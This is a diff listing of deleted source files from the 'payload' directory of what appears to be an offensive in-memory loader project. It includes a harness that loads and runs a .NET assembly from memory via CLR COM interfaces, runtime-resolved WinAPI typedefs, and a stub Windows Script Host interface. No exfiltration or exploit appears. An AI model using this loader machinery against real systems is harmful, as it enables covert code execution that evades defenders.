320 hr = ad->add_ProcessExit(handler);
321 printf("HRESULT : %08lx\n", hr);
322
323 sab.lLbound = 0;
324 sab.cElements = len;
325 printf("SafeArrayCreate()\n");
326 sa = SafeArrayCreate(VT_UI1, 1, &sab);
327
328 if(sa != NULL) {
329 CopyMemory(sa->pvData, code, len);
330 printf("AppDomain::Load_3()\n");
331 hr = ad->Load_3(sa, &as);
332 if(SUCCEEDED(hr)) {
333 printf("Assembly::get_EntryPoint()\n");
334 hr = as->get_EntryPoint(&mi);
335 if(SUCCEEDED(hr)) {
336 v1.vt = VT_NULL;
337 v1.plVal = NULL;
338 printf("MethodInfo::Invoke_3()\n");
339 hr = mi->Invoke_3(v1, NULL, &v2);
340 mi->Release();
341 }
342 as->Release();
343 }
344 SafeArrayDestroy(sa);
345 }
346 ad->Release();
347 }
348 iu->Release();
349 }
350 icrh->Stop();
351 }
352 icrh->Release();
353 }
354
355 int main(int argc, char *argv[])
356 {
357 void *mem;
358 struct stat fs;
359 FILE *fd;
360
361 if(argc != 2) {
362 printf("usage: rundotnet <.NET assembly>\n");
363 return 0;
364 }
365
366 // 1. get the size of file
367 stat(argv[1], &fs);
368
369 if(fs.st_size == 0) {
370 printf("file is empty.\n");
371 return 0;
372 }
373
374 // 2. try open assembly
375 fd = fopen(argv[1], "rb");
376 if(fd == NULL) {
377 printf("unable to open \"%s\".\n", argv[1]);
378 return 0;
379 }
380 // 3. allocate memory
381 mem = malloc(fs.st_size);
382 if(mem != NULL) {
383 // 4. read file into memory
384 fread(mem, 1, fs.st_size, fd);
385 // 5. run the program from memory
386 rundotnet(mem, fs.st_size);
387 // 6. free memory
388 free(mem);
389 }
390 // 7. close assembly
391 fclose(fd);
392
393 return 0;
394 }
395
396 /**
397 sav = SafeArrayCreateVector(VT_UNKNOWN, 0, 1);
398 BSTR i32 = SysAllocString(L"System.Int32");
399
400 as2->GetType_2(i32, &ptr);
401 idx = 0;
402 SafeArrayPutElement(sav, &idx, ptr);
403
404 BSTR alloc = SysAllocString(L"AllocHGlobal");
405 BSTR marshal = SysAllocString(L"System.Runtime.InteropServices.Marshal");
406 hr = as1->GetType_2(marshal, &mars);
407
408 hr = mars->GetMethod(alloc,
409 (mscorlib::BindingFlags)
410 (mscorlib::BindingFlags_Static | mscorlib::BindingFlags_Public),
411 NULL, // Binder
412 sav, // SAFEARRAY(_Type*)
413 NULL, // Modifiers
414 &mi); // MethodInfo
415
416 printf("System.Runtime.InteropServices.Marshal.GetMethod(AllocCoTaskMem) : %lx\n", hr);
417
418 sav = SafeArrayCreateVector(VT_VARIANT, 0, 1);
419 idx = 0;
420 V_VT(&v_type) = VT_I4;
421 V_I4(&v_type) = 0x12345678;
422 SafeArrayPutElement(sav, &idx, &v_type);
423
424 v1.vt = VT_EMPTY;
425 VariantClear(&ret);
426
427 printf("Press any key to continue...\n");
428 getchar();
429
430 printf("Calling AllocCoTaskMem\n");
431 hr = mi->Invoke_3(
432 v1,
433 sav, // arguments to method
434 &ret); // return value from method
435
436 printf("%lx %p\n", hr, (LPVOID)V_BYREF(&ret));
437 getchar();
438 return;
439 */
+0
-414
payload/winapi.h less more
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 #ifndef WINAPI_H
32 #define WINAPI_H
33
34 #include <windows.h>
35
36 typedef void (WINAPI *Sleep_t)(DWORD dwMilliseconds);
37
38 typedef int (WINAPI *MultiByteToWideChar_t)(
39 UINT CodePage,
40 DWORD dwFlags,
41 LPCCH lpMultiByteStr,
42 int cbMultiByte,
43 LPWSTR lpWideCharStr,
44 int cchWideChar);
45
46 typedef int (WINAPI *WideCharToMultiByte_t)(
47 UINT CodePage,
48 DWORD dwFlags,
49 LPCWCH lpWideCharStr,
50 int cchWideChar,
51 LPSTR lpMultiByteStr,
52 int cbMultiByte,
53 LPCCH lpDefaultChar,
54 LPBOOL lpUsedDefaultChar);
55
56 // imports from shlwapi.dll
57 typedef LSTATUS (WINAPI *SHGetValueA_t)(
58 HKEY hkey,
59 LPCSTR pszSubKey,
60 LPCSTR pszValue,
61 DWORD *pdwType,
62 void *pvData,
63 DWORD *pcbData);
64
65 // imports from mscoree.dll
66 typedef HRESULT (WINAPI *CLRCreateInstance_t)(
67 REFCLSID clsid,
68 REFIID riid,
69 LPVOID *ppInterface);
70
71 typedef HRESULT (WINAPI *CorBindToRuntime_t) (
72 LPCWSTR pwszVersion,
73 LPCWSTR pwszBuildFlavor,
74 REFCLSID rclsid,
75 REFIID riid,
76 LPVOID FAR *ppv);
77
78 // imports from ole32.dll
79 typedef HRESULT (WINAPI *CoInitializeEx_t)(
80 LPVOID pvReserved,
81 DWORD dwCoInit);
82
83 typedef void (WINAPI *CoUninitialize_t)(void);
84
85 typedef HRESULT (WINAPI *CoCreateInstance_t)(
86 REFCLSID rclsid,
87 LPUNKNOWN pUnkOuter,
88 DWORD dwClsContext,
89 REFIID riid,
90 LPVOID *ppv);
91
92 typedef HRESULT (WINAPI *CreateStdDispatch_t)(
93 IUnknown *punkOuter,
94 void *pvThis,
95 ITypeInfo *ptinfo,
96 IUnknown **ppunkStdDisp);
97
98 typedef HRESULT (WINAPI *CreateErrorInfo_t)(
99 ICreateErrorInfo **pperrinfo);
100
101 typedef HRESULT (WINAPI *CreateDispTypeInfo_t)(
102 INTERFACEDATA *pidata,
103 LCID lcid,
104 ITypeInfo **pptinfo);
105
106 typedef HRESULT (WINAPI *GetErrorInfo_t)(
107 ULONG dwReserved,
108 IErrorInfo **pperrinfo);
109
110 typedef HRESULT (WINAPI *LoadTypeLib_t)(
111 LPCOLESTR szFile,
112 ITypeLib **pptlib);
113
114 typedef HRESULT (WINAPI *LoadTypeLibEx_t)(
115 LPCOLESTR szFile,
116 REGKIND regkind,
117 ITypeLib **pptlib);
118
119 typedef LCID (WINAPI *GetUserDefaultLCID_t)(VOID);
120
121 // imports from oleaut32.dll
122 typedef HRESULT (WINAPI *SafeArrayGetLBound_t)(
123 SAFEARRAY *psa,
124 UINT nDim,
125 LONG *plLbound);
126
127 typedef HRESULT (WINAPI *SafeArrayGetUBound_t)(
128 SAFEARRAY *psa,
129 UINT nDim,
130 LONG *plUbound);
131
132 typedef SAFEARRAY* (WINAPI *SafeArrayCreate_t)(
133 VARTYPE vt,
134 UINT cDims,
135 SAFEARRAYBOUND *rgsabound);
136
137 typedef SAFEARRAY* (WINAPI *SafeArrayCreateVector_t)(
138 VARTYPE vt,
139 LONG lLbound,
140 ULONG cElements);
141
142 typedef HRESULT (WINAPI *SafeArrayPutElement_t)(
143 SAFEARRAY *psa,
144 LONG *rgIndices,
145 void *pv);
146
147 typedef HRESULT (WINAPI *SafeArrayDestroy_t)(
148 SAFEARRAY *psa);
149
150 typedef BSTR (WINAPI *SysAllocString_t)(
151 const OLECHAR *psz);
152
153 typedef void (WINAPI *SysFreeString_t)(
154 BSTR bstrString);
155
156 // imports from kernel32.dll
157 typedef HMODULE (WINAPI *LoadLibraryA_t)(
158 LPCSTR lpLibFileName);
159
160 typedef FARPROC (WINAPI *GetProcAddress_t)(
161 HMODULE hModule,
162 LPCSTR lpProcName);
163
164 typedef BOOL (WINAPI *AllocConsole_t)(void);
165
166 typedef BOOL (WINAPI *AttachConsole_t)(
167 DWORD dwProcessId);
168
169 typedef BOOL (WINAPI *SetConsoleCtrlHandler_t)(
170 PHANDLER_ROUTINE HandlerRoutine,
171 BOOL Add);
172
173 typedef HANDLE (WINAPI *GetStdHandle_t)(
174 DWORD nStdHandle);
175
176 typedef BOOL (WINAPI *SetStdHandle_t)(
177 DWORD nStdHandle,
178 HANDLE hHandle);
179
180 typedef HANDLE (WINAPI *CreateFileA_t)(
181 LPCSTR lpFileName,
182 DWORD dwDesiredAccess,
183 DWORD dwShareMode,
184 LPSECURITY_ATTRIBUTES lpSecurityAttributes,
185 DWORD dwCreationDisposition,
186 DWORD dwFlagsAndAttributes,
187 HANDLE hTemplateFile);
188
189 typedef HANDLE (WINAPI *CreateEventA_t)(
190 LPSECURITY_ATTRIBUTES lpEventAttributes,
191 BOOL bManualReset,
192 BOOL bInitialState,
193 LPCSTR lpName);
194
195 typedef BOOL (WINAPI *CloseHandle_t)(HANDLE hObject);
196
197 typedef BOOL (WINAPI *SetEvent_t)(HANDLE hEvent);
198
199 typedef DWORD (WINAPI *GetCurrentThreadId_t)(VOID);
200
201 typedef DWORD (WINAPI *GetCurrentProcessId_t)(VOID);
202
203 typedef HHOOK (WINAPI *SetWindowsHookExA_t)(
204 int idHook,
205 HOOKPROC lpfn,
206 HINSTANCE hmod,
207 DWORD dwThreadId);
208
209 typedef BOOL (WINAPI *CreateProcessA_t)(
210 LPCSTR lpApplicationName,
211 LPSTR lpCommandLine,
212 LPSECURITY_ATTRIBUTES lpProcessAttributes,
213 LPSECURITY_ATTRIBUTES lpThreadAttributes,
214 BOOL bInheritHandles,
215 DWORD dwCreationFlags,
216 LPVOID lpEnvironment,
217 LPCSTR lpCurrentDirectory,
218 LPSTARTUPINFOA lpStartupInfo,
219 LPPROCESS_INFORMATION lpProcessInformation);
220
221 typedef DWORD (WINAPI *WaitForSingleObject_t)(
222 HANDLE hHandle,
223 DWORD dwMilliseconds);
224
225 // imports from wininet.dll
226 typedef BOOL (WINAPI *InternetCrackUrl_t)(
227 LPCSTR lpszUrl,
228 DWORD dwUrlLength,
229 DWORD dwFlags,
230 LPURL_COMPONENTS lpUrlComponents);
231
232 typedef HINTERNET (WINAPI *InternetOpen_t)(
233 LPCSTR lpszAgent,
234 DWORD dwAccessType,
235 LPCSTR lpszProxy,
236 LPCSTR lpszProxyBypass,
237 DWORD dwFlags);
238
239 typedef HINTERNET (WINAPI *InternetConnect_t)(
240 HINTERNET hInternet,
241 LPCSTR lpszServerName,
242 INTERNET_PORT nServerPort,
243 LPCSTR lpszUserName,
244 LPCSTR lpszPassword,
245 DWORD dwService,
246 DWORD dwFlags,
247 DWORD_PTR dwContext);
248
249 typedef HINTERNET (WINAPI *HttpOpenRequest_t)(
250 HINTERNET hConnect,
251 LPCSTR lpszVerb,
252 LPCSTR lpszObjectName,
253 LPCSTR lpszVersion,
254 LPCSTR lpszReferrer,
255 LPCSTR *lplpszAcceptTypes,
256 DWORD dwFlags,
257 DWORD_PTR dwContext);
258
259 typedef BOOL (WINAPI *InternetSetOption_t)(
260 HINTERNET hInternet,
261 DWORD dwOption,
262 LPVOID lpBuffer,
263 DWORD dwBufferLength);
264
265 typedef BOOL (WINAPI *HttpSendRequest_t)(
266 HINTERNET hRequest,
267 LPCSTR lpszHeaders,
268 DWORD dwHeadersLength,
269 LPVOID lpOptional,
270 DWORD dwOptionalLength);
271
272 typedef BOOL (WINAPI *HttpQueryInfo_t)(
273 HINTERNET hRequest,
274 DWORD dwInfoLevel,
275 LPVOID lpBuffer,
276 LPDWORD lpdwBufferLength,
277 LPDWORD lpdwIndex);
278
279 typedef BOOL (WINAPI *InternetReadFile_t)(
280 HINTERNET hFile,
281 LPVOID lpBuffer,
282 DWORD dwNumberOfBytesToRead,
283 LPDWORD lpdwNumberOfBytesRead);
284
285 typedef BOOL (WINAPI *InternetCloseHandle_t)(
286 HINTERNET hInternet);
287
288 typedef BOOL (WINAPI *CryptAcquireContext_t)(
289 HCRYPTPROV *phProv,
290 LPCSTR szContainer,
291 LPCSTR szProvider,
292 DWORD dwProvType,
293 DWORD dwFlags);
294
295 typedef void (WINAPI *GetSystemInfo_t)(
296 LPSYSTEM_INFO lpSystemInfo);
297
298 typedef SIZE_T (WINAPI *VirtualQuery_t)(
299 LPCVOID lpAddress,
300 PMEMORY_BASIC_INFORMATION lpBuffer,
301 SIZE_T dwLength);
302
303 typedef BOOL (WINAPI *VirtualProtect_t)(
304 LPVOID lpAddress,
305 SIZE_T dwSize,
306 DWORD flNewProtect,
307 PDWORD lpflOldProtect);
308
309 typedef HMODULE (WINAPI *GetModuleHandleA_t)(
310 LPCSTR lpModuleName);
311
312 typedef HMODULE (WINAPI *LoadLibraryExA_t)(
313 LPCSTR lpLibFileName,
314 HANDLE hFile,
315 DWORD dwFlags);
316
317 typedef HMODULE (WINAPI *LoadLibraryExW_t)(
318 LPCWSTR lpLibFileName,
319 HANDLE hFile,
320 DWORD dwFlags);
321
322 typedef BOOL (WINAPI *CryptStringToBinaryA_t)(
323 LPCSTR pszString,
324 DWORD cchString,
325 DWORD dwFlags,
326 BYTE *pbBinary,
327 DWORD *pcbBinary,
328 DWORD *pdwSkip,
329 DWORD *pdwFlags);
330
331 typedef BOOL (WINAPI *CryptDecodeObjectEx_t)(
332 DWORD dwCertEncodingType,
333 LPCSTR lpszStructType,
334 const BYTE *pbEncoded,
335 DWORD cbEncoded,
336 DWORD dwFlags,
337 PCRYPT_DECODE_PARA pDecodePara,
338 void *pvStructInfo,
339 DWORD *pcbStructInfo);
340
341 typedef BOOL (WINAPI *CryptImportPublicKeyInfo_t)(
342 HCRYPTPROV hCryptProv,
343 DWORD dwCertEncodingType,
344 PCERT_PUBLIC_KEY_INFO pInfo,
345 HCRYPTKEY *phKey);
346
347 typedef BOOL (WINAPI *CryptCreateHash_t)(
348 HCRYPTPROV hProv,
349 ALG_ID Algid,
350 HCRYPTKEY hKey,
351 DWORD dwFlags,
352 HCRYPTHASH *phHash);
353
354 typedef BOOL (WINAPI *CryptHashData_t)(
355 HCRYPTHASH hHash,
356 const BYTE *pbData,
357 DWORD dwDataLen,
358 DWORD dwFlags);
359
360 typedef BOOL (WINAPI *CryptVerifySignature_t)(
361 HCRYPTHASH hHash,
362 const BYTE *pbSignature,
363 DWORD dwSigLen,
364 HCRYPTKEY hPubKey,
365 LPCSTR szDescription,
366 DWORD dwFlags);
367
368 typedef BOOL (WINAPI *CryptDestroyHash_t)(
369 HCRYPTHASH hHash);
370
371 typedef BOOL (WINAPI *CryptDestroyKey_t)(
372 HCRYPTKEY hKey);
373
374 typedef BOOL (WINAPI *CryptReleaseContext_t)(
375 HCRYPTPROV hProv,
376 DWORD dwFlags);
377
378 typedef LPVOID (WINAPI *VirtualAlloc_t)(
379 LPVOID lpAddress,
380 SIZE_T dwSize,
381 DWORD flAllocationType,
382 DWORD flProtect);
383
384 typedef BOOL (WINAPI *VirtualFree_t)(
385 LPVOID lpAddress,
386 SIZE_T dwSize,
387 DWORD dwFreeType);
388
389 typedef HLOCAL (WINAPI *LocalFree_t)(
390 HLOCAL hMem);
391
392 typedef HRSRC (WINAPI *FindResource_t)(
393 HMODULE hModule,
394 LPCSTR lpName,
395 LPCSTR lpType);
396
397 typedef HGLOBAL (WINAPI *LoadResource_t)(
398 HMODULE hModule,
399 HRSRC hResInfo);
400
401 typedef LPVOID (WINAPI *LockResource_t)(
402 HGLOBAL hResData);
403
404 typedef DWORD (WINAPI *SizeofResource_t)(
405 HMODULE hModule,
406 HRSRC hResInfo);
407
408 typedef void (WINAPI *RtlZeroMemory_t)(
409 LPVOID Destination,
410 SIZE_T Length);
411 #endif
412
413
+0
-341
payload/wscript.c less more
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 // initialize interface with methods/properties
32 static HRESULT Host_New(PDONUT_INSTANCE inst, IHost *host) {
33 HRESULT hr;
34
35 // IUnknown interface
36 host->lpVtbl->QueryInterface = ADR(LPVOID, Host_QueryInterface);
37 host->lpVtbl->AddRef = ADR(LPVOID, Host_AddRef);
38 host->lpVtbl->Release = ADR(LPVOID, Host_Release);
39
40 // IDispatch interface
41 host->lpVtbl->GetTypeInfoCount = ADR(LPVOID, Host_GetTypeInfoCount);
42 host->lpVtbl->GetTypeInfo = ADR(LPVOID, Host_GetTypeInfo);
43 host->lpVtbl->GetIDsOfNames = ADR(LPVOID, Host_GetIDsOfNames);
44 host->lpVtbl->Invoke = ADR(LPVOID, Host_Invoke);
45
46 // IHost interface
47 host->lpVtbl->get_Name = ADR(LPVOID, Host_get_Name);
48 host->lpVtbl->get_Application = ADR(LPVOID, Host_get_Application);
49 host->lpVtbl->get_FullName = ADR(LPVOID, Host_get_FullName);
50 host->lpVtbl->get_Path = ADR(LPVOID, Host_get_Path);
51 host->lpVtbl->get_Interactive = ADR(LPVOID, Host_get_Interactive);
52 host->lpVtbl->put_Interactive = ADR(LPVOID, Host_put_Interactive);
53 host->lpVtbl->Quit = ADR(LPVOID, Host_Quit);
54 host->lpVtbl->get_ScriptName = ADR(LPVOID, Host_get_ScriptName);
55 host->lpVtbl->get_ScriptFullName = ADR(LPVOID, Host_get_ScriptFullName);
56 host->lpVtbl->get_Arguments = ADR(LPVOID, Host_get_Arguments);
57 host->lpVtbl->get_Version = ADR(LPVOID, Host_get_Version);
58 host->lpVtbl->get_BuildVersion = ADR(LPVOID, Host_get_BuildVersion);
59 host->lpVtbl->get_Timeout = ADR(LPVOID, Host_get_Timeout);
60 host->lpVtbl->put_Timeout = ADR(LPVOID, Host_put_Timeout);
61 host->lpVtbl->CreateObject = ADR(LPVOID, Host_CreateObject);
62 host->lpVtbl->Echo = ADR(LPVOID, Host_Echo);
63 host->lpVtbl->GetObject = ADR(LPVOID, Host_GetObject);
64 host->lpVtbl->DisconnectObject = ADR(LPVOID, Host_DisconnectObject);
65 host->lpVtbl->Sleep = ADR(LPVOID, Host_Sleep);
66 host->lpVtbl->ConnectObject = ADR(LPVOID, Host_ConnectObject);
67 host->lpVtbl->get_StdIn = ADR(LPVOID, Host_get_StdIn);
68 host->lpVtbl->get_StdOut = ADR(LPVOID, Host_get_StdOut);
69 host->lpVtbl->get_StdErr = ADR(LPVOID, Host_get_StdErr);
70
71 host->m_cRef = 0;
72 host->inst = inst;
73
74 DPRINT("LoadTypeLib(\"%ws\")", inst->wscript_exe);
75 hr = inst->api.LoadTypeLib(inst->wscript_exe, &host->lpTypeLib);
76
77 if(hr == S_OK) {
78 DPRINT("ITypeLib::GetTypeInfoOfGuid");
79
80 hr = host->lpTypeLib->lpVtbl->GetTypeInfoOfGuid(
81 host->lpTypeLib, &inst->xIID_IHost, &host->lpTypeInfo);
82 }
83 DPRINT("HRESULT : %08lx", hr);
84 return hr;
85 }
86
87 // Queries a COM object for a pointer to one of its interface.
88 static HRESULT WINAPI Host_QueryInterface(IHost *iface, REFIID riid, void **ppv) {
89 DPRINT("WScript::QueryInterface");
90
91 if(ppv == NULL) return E_POINTER;
92
93 // we implement the following interfaces
94 if(IsEqualIID(&iface->inst->xIID_IUnknown, riid) ||
95 IsEqualIID(&iface->inst->xIID_IDispatch, riid) ||
96 IsEqualIID(&iface->inst->xIID_IHost, riid))
97 {
98 *ppv = iface;
99 return S_OK;
100 }
101 *ppv = NULL;
102 return E_NOINTERFACE;
103 }
104
105 // Increments the reference count for an interface pointer to a COM object.
106 static ULONG WINAPI Host_AddRef(IHost *iface) {
107 DPRINT("WScript::AddRef");
108
109 _InterlockedIncrement(&iface->m_cRef);
110 return iface->m_cRef;
111 }
112
113 // Decrements the reference count for an interface on a COM object.
114 static ULONG WINAPI Host_Release(IHost *iface) {
115 DPRINT("WScript::Release");
116
117 ULONG ref = _InterlockedDecrement(&iface->m_cRef);
118 return ref;
119 }
120
121 // Retrieves the number of type information interfaces that an object provides (either 0 or 1).
122 static HRESULT WINAPI Host_GetTypeInfoCount(IHost *iface, UINT *pctinfo) {
123 DPRINT("WScript::GetTypeInfoCount");
124
125 if(pctinfo == NULL) return E_POINTER;
126
127 *pctinfo = 1;
128 return S_OK;
129 }
130
131 // Retrieves the type information for an object, which can then be used to get the type information for an interface.
132 static HRESULT WINAPI Host_GetTypeInfo(IHost *iface, UINT iTInfo, LCID lcid, ITypeInfo **ppTInfo) {
133 DPRINT("WScript::GetTypeInfo");
134
135 if(ppTInfo == NULL) return E_POINTER;
136
137 iface->lpTypeInfo->lpVtbl->AddRef(iface->lpTypeInfo);
138 *ppTInfo = iface->lpTypeInfo;
139
140 return S_OK;
141 }
142
143 // Maps a single member and an optional set of argument names to a corresponding set of integer DISPIDs,
144 // which can be used on subsequent calls to Invoke.
145 static HRESULT WINAPI Host_GetIDsOfNames(IHost *iface, REFIID riid,
146 LPOLESTR *rgszNames, UINT cNames, LCID lcid, DISPID *rgDispId) {
147 DPRINT("WScript::GetIDsOfNames");
148
149 return iface->lpTypeInfo->lpVtbl->GetIDsOfNames(iface->lpTypeInfo, rgszNames, cNames, rgDispId);
150 }
151
152 // Provides access to properties and methods exposed by an object.
153 // The dispatch function DispInvoke provides a standard implementation of Invoke.
154 static HRESULT WINAPI Host_Invoke(
155 IHost *iface, DISPID dispIdMember, REFIID riid,
156 LCID lcid, WORD wFlags, DISPPARAMS *pDispParams, VARIANT *pVarResult,
157 EXCEPINFO *pExcepInfo, UINT *puArgErr) {
158
159 DPRINT("WScript::Invoke");
160
161 HRESULT hr = iface->lpTypeInfo->lpVtbl->Invoke(
162 iface->lpTypeInfo, iface, dispIdMember, wFlags, pDispParams,
163 pVarResult, pExcepInfo, puArgErr);
164
165 DPRINT("HRESULT : %08lx", hr);
166
167 return hr;
168 }
169
170 // Returns the name of the WScript object (the host executable file).
171 static HRESULT WINAPI Host_get_Name(IHost *iface, BSTR *out_Name) {
172 DPRINT("WScript::Name");
173
174 return S_OK;
175 }
176
177 static HRESULT WINAPI Host_get_Application(IHost *iface, IDispatch **out_Dispatch) {
178 DPRINT("WScript::Application");
179
180 return E_NOTIMPL;
181 }
182
183 // Returns the fully qualified path of the host executable (CScript.exe or WScript.exe).
184 static HRESULT WINAPI Host_get_FullName(IHost *iface, BSTR *out_Path) {
185 DPRINT("WScript::FullName");
186
187 return E_NOTIMPL;
188 }
189
190 static HRESULT WINAPI Host_get_Path(IHost *iface, BSTR *out_Path) {
191 DPRINT("WScript::Path");
192
193 return E_NOTIMPL;
194 }
195
196 // Gets the script mode, or identifies the script mode.
197 static HRESULT WINAPI Host_get_Interactive(IHost *iface, VARIANT_BOOL *out_Interactive) {
198 DPRINT("WScript::get_Interactive");
199
200 return E_NOTIMPL;
201 }
202
203 // Sets the script mode, or identifies the script mode.
204 static HRESULT WINAPI Host_put_Interactive(IHost *iface, VARIANT_BOOL v) {
205 DPRINT("WScript::put_Interactive");
206
207 return E_NOTIMPL;
208 }
209
210 // Forces script execution to stop at any time.
211 static HRESULT WINAPI Host_Quit(IHost *iface, int ExitCode) {
212 DPRINT("WScript::Quit(%i)", ExitCode);
213
214 // if you know of a better way to do this..let me know.
215 iface->lpEngine->lpVtbl->InterruptScriptThread(iface->lpEngine, SCRIPTTHREADID_CURRENT, NULL, 0);
216
217 return S_OK;
218 }
219
220 // Returns the file name of the currently running script.
221 static HRESULT WINAPI Host_get_ScriptName(IHost *iface, BSTR *out_ScriptName) {
222 DPRINT("WScript::ScriptName");
223
224 return E_NOTIMPL;
225 }
226
227 // Returns the full path of the currently running script.
228 static HRESULT WINAPI Host_get_ScriptFullName(IHost *iface, BSTR *out_ScriptFullName) {
229 DPRINT("WScript::ScriptFullName");
230
231 return E_NOTIMPL;
232 }
233
234 // Returns the WshArguments object (a collection of arguments).
235 static HRESULT WINAPI Host_get_Arguments(
236 IHost *iface, void **out_Arguments) { // IArguments2
237 DPRINT("WScript::Arguments");
238
239 return E_NOTIMPL;
240 }
241
242 static HRESULT WINAPI Host_get_Version(IHost *iface, BSTR *out_Version) {
243 DPRINT("WScript::Version");
244
245 return E_NOTIMPL;
246 }
247
248 // Returns the Windows Script Host build version number.
249 static HRESULT WINAPI Host_get_BuildVersion(IHost *iface, int *out_Build) {
250 DPRINT("WScript::BuildVersion");
251
252 return E_NOTIMPL;
253 }
254
255 static HRESULT WINAPI Host_get_Timeout(IHost *iface, LONG *out_Timeout) {
256 DPRINT("WScript::get_Timeout");
257
258 return E_NOTIMPL;
259 }
260
261 static HRESULT WINAPI Host_put_Timeout(IHost *iface, LONG v) {
262 DPRINT("WScript::put_Timeout");
263
264 return E_NOTIMPL;
265 }
266
267 // Connects the object's event sources to functions with a given prefix.
268 static HRESULT WINAPI Host_CreateObject(IHost *iface, BSTR ProgID, BSTR Prefix,
269 IDispatch **out_Dispatch) {
270 DPRINT("WScript::CreateObject");
271
272 return E_NOTIMPL;
273 }
274
275 // Outputs text to either a message box or the command console window.
276 static HRESULT WINAPI Host_Echo(
277 IHost *iface, SAFEARRAY *args) {
278 DPRINT("WScript::Echo");
279
280 return E_NOTIMPL;
281 }
282
283 // Retrieves an existing object with the specified ProgID, or creates a new one from a file.
284 static HRESULT WINAPI Host_GetObject(
285 IHost *iface, BSTR Pathname, BSTR ProgID,
286 BSTR Prefix, IDispatch **out_Dispatch) {
287 DPRINT("WScript::GetObject");
288
289 return E_NOTIMPL;
290 }
291
292 // Disconnects a connected object's event sources.
293 static HRESULT WINAPI Host_DisconnectObject(
294 IHost *iface, IDispatch *Object) {
295 DPRINT("WScript::DisconnectObject");
296
297 return E_NOTIMPL;
298 }
299
300 // Suspends script execution for a specified length of time, then continues execution.
301 static HRESULT WINAPI Host_Sleep(
302 IHost *iface, LONG Time) {
303
304 DPRINT("WScript::Sleep");
305 iface->inst->api.Sleep((DWORD)Time);
306
307 return S_OK;
308 }
309
310 // Connects the object's event sources to functions with a given prefix.
311 static HRESULT WINAPI Host_ConnectObject(
312 IHost *iface, IDispatch *Object, BSTR Prefix) {
313 DPRINT("WScript::ConnectObject");
314
315 return E_NOTIMPL;
316 }
317
318 // Exposes the read-only input stream for the current script.
319 static HRESULT WINAPI Host_get_StdIn(
320 IHost *iface, void **ppts) { // ppts is ITextStream
321 DPRINT("WScript::StdIn");
322
323 return E_NOTIMPL;
324 }
325
326 // Exposes the write-only output stream for the current script.
327 static HRESULT WINAPI Host_get_StdOut(
328 IHost *iface, void **ppts) { // ppts is ITextStream
329 DPRINT("WScript::StdOut");
330
331 return E_NOTIMPL;
332 }
333
334 // Exposes the write-only error output stream for the current script.
335 static HRESULT WINAPI Host_get_StdErr(
336 IHost *iface, void **ppts) { // ppts is ITextStream
337 DPRINT("WScript::StdErr");
338
339 return E_NOTIMPL;
340 }
+0
-284
payload/wscript.h less more
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
